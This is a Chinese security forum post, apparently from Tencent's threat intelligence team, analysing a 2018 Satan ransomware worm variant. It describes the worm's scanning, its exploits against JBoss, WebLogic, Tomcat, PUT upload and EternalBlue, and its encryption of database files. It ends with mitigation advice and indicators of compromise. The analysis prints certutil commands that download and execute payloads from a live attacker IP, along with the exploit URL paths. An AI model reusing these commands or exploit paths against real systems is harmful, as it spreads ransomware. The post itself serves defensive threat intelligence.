查看: 2645|回复: 0
收起左侧

[技术原创] 撒旦(Satan)勒索蠕虫最新变种攻击方式解析

[复制链接]
腾讯电脑管家
发表于 2018-6-7 15:41:31 | 显示全部楼层 |阅读模式
本帖最后由 腾讯电脑管家 于 2018-6-7 16:43 编辑

0x1 概述
撒旦(Satan)勒索病毒2017年初被外媒进行了曝光。被曝光后,撒旦(Satan)勒索病毒非但没停止攻击的脚步,反而不断的进行优化,跟安全软件做持久性的对抗。腾讯御见威胁情报中心在2018年4月曝光了撒旦(Satan)勒索病毒变种携”永恒之蓝”漏洞卷土归来。
腾讯御见威胁情报中心最新监测发现,撒旦(Satan)勒索病毒的传播方式再度升级,不但继续使用“永恒之蓝”漏洞攻击,还携带了其他多个漏洞攻击模块,包括JBoss反序列化漏洞(CVE-2017-12149)、JBoss默认配置漏洞(CVE-2010-0738)、Put任意上传文件漏洞、Tomcat web管理后台弱口令爆破、Weblogic WLS 组件漏洞(CVE-2017-10271),使该病毒的感染扩散能力、影响范围得以显著增强。
撒旦(Satan)勒索病毒最新变种的攻击流程:
0x2 技术分析
从本次捕捉到的最新撒旦(Satan)勒索蠕虫病毒来看,该病毒核心包含扫描、攻击、勒索三个模块。
1、 扫描模块
该模块用于寻找目标主机以进行下一步攻击。扫描分为内网扫描和公网扫描:
1)  内网扫描:读取本机网络地址生成C段扫描
2) 公网扫描:通过随机读取内置ip硬编码与内置随机端口组合进行扫描。
内置端口:
内置3900多组IP地址段:
部分IP段:
起始IP
结束IP
1.10.0.0
1.10.254.254
1.119.0.0
1.119.254.254
1.180.0.0
1.180.254.254
1.183.0.0
1.183.254.254
1.188.0.0
1.188.254.254
1.189.0.0
1.189.254.254
1.190.0.0
1.190.254.254
1.191.0.0
1.191.254.254
1.192.0.0
1.192.254.254
1.193.0.0
1.193.254.254
1.194.0.0
1.194.254.254
1.195.0.0
1.195.254.254
1.196.0.0
1.196.254.254
1.197.0.0
1.197.254.254
1.198.0.0
1.198.254.254
1.199.0.0
1.199.254.254
1.202.0.0
1.202.254.254
1.203.0.0
1.203.254.254
1.205.0.0
1.205.254.254
1.206.0.0
1.206.254.254
1.207.0.0
1.207.254.254
1.24.0.0
1.24.254.254
1.25.0.0
1.25.254.254
1.26.0.0
1.26.254.254
1.27.0.0
1.27.254.254
1.28.0.0
1.28.254.254
1.29.0.0
1.29.254.254
1.30.0.0
1.30.254.254
1.31.0.0
1.31.254.254

2、 攻击模块
扫描发现目标后,对目标存活的机器进行相同的多个漏洞攻击。
1) JBoss反序列化漏洞(CVE-2017-12149)
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
样本中漏洞攻击模块利用已空开的payload对URL拓展/invoker/readonlyj进行漏洞攻击,payload触发漏洞后会从服务器上下载sts.exe(母体)和setup.exe(撒旦(Satan)勒索部分)。
序列化payload:
下载命令:
cmd.exe /c certutil.exe -urlcache -split -f http://101.99.84.136/cab/sts.exe c:/sts.exe&cmd.exe /c c:\sts.exe
cmd.exe /c certutil.exe -urlcache -split -f http://101.99.84.136/cab/setup.exe c:/setupst.exe&cmd.exe /c c:\setupst.exe
2) JBoss默认配置漏洞(CVE-2010-0738)
由于JBoss配置不正确,就会允许攻击者执行各种恶意活动。由于JMX在通常情况下可以通过8080端口进行远程访问,黑客和恶意用户可以通过JBoss控制台功能中的DeploymentScanner来部署上传自己的WAR文件和JSP shells。
样本中漏洞攻击模块会对URL拓展/jmx-console/HtmlAdaptor进行访问,然后会利用jboss.deployment下载上传no3.war包执行。
War包中的jsp文件实际上也会去服务器继续下载样本:
3) Put任意上传文件漏洞
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意文件。
样本中漏洞攻击模块会对URL进行Put Clist1.jsp文件,如果成功再去访问jsp执行下载。
Put  jsp的内容:
4) Tomcat web管理后台弱口令爆破
Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等, /manager/html为tomcat自带管理功能后台,如果密码强度不高,容易被黑客破解入侵。
样本中漏洞攻击模块会对URL拓展manager/html进行访问,如果返回401则开始利用内置字典进行爆破。
5) Weblogic WLS 组件漏洞(CVE-2017-10271)
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器组件。
漏洞引发的原因是Weblogic“wls-wsat”组件在反序列化操作时使用了Oracle官方的JDK组件中“XMLDecoder”类进行XML反序列化操作引发了代码执行,远程攻击者利用该漏洞通过发送精心构造好的HTTPXML数据包请求,直接在目标服务器执行Java代码或操作系统命令。
样本中漏洞攻击模块会对URL拓展/wls-wsat/CoordinatorPortType进行访问发送payload,这里payload目的也是去服务器下载样本。
6) 永恒之蓝”漏洞
“永恒之蓝”自从被黑客组织公开后,被WannaCry等多种恶意病毒使用,虽然大多数用户已经修复了此漏洞,但是还有一部分未修复漏洞的用户面临被攻击的危险。
样本中该漏洞攻击模块利用释放的“永恒之蓝”组件和从服务器上下载的Mimikatz对445端口进行扫描攻击,以便从服务器上下载sts.exe进一步的传播。
3、 勒索模块
此次的撒旦(Satan)勒索病毒,跟之前一样,依旧以感染服务器中的数据库文件为主。加密后修改文件后缀为:.Satan
被加密的文件主要是数据库文件和压缩、备份文件,后缀名包括:
.mdf、.ldf、.myd、myi、frm、dbf、.bak、.sql、.rar、.zip、.dmp……
勒索信息提供3种语言:英语,汉语和韩语,根据提示,需要支付0.3个比特币作为赎金,才会对文件进行解密,并且三天内没有支付的话,电脑中的文件将无法解密。
0x3安全建议
腾讯御见威胁情报中心提醒用户注意以下几点:
1、服务器关闭不必要的端口,方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
3、推荐企业用户使用御点终端安全管理系统(下载地址:https://s.tencent.com/product/yd/index.html),及时修复系统高危漏洞,拦截可能的病毒攻击。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。
0x4 Iocs
C2:
http://101.99.84.136/data/token.php?status=ST&code=
http://101.99.84.136/data/token.php?status=BK&code=
http://101.99.84.136/data/token.php?status=DB&code=

URL:
http://101.99.84.136/cab/mmkt32.exe
http://101.99.84.136/cab/mmkt64.exe
http://101.99.84.136/cab/no3.exe
http://101.99.84.136/cab/no4.exe
http://101.99.84.136/cab/sts.exe
http://101.99.84.136/cab/st.exe
http://101.99.84.136/cab/setup.exe

MD5:
1fedee59eb95756282cff2493da93689
c290cd24892905fbcf3cb39929de19a5
58d30af5992e33b351293b23ce97724f
c2e413cf553d253578bf1b5674cfbdc2

参考文献:
《魔鬼撒旦(Satan)勒索病毒携永恒之蓝卷土重来 主攻数据库》
http://www.freebuf.com/column/167539.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-21 21:35 , Processed in 0.131925 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表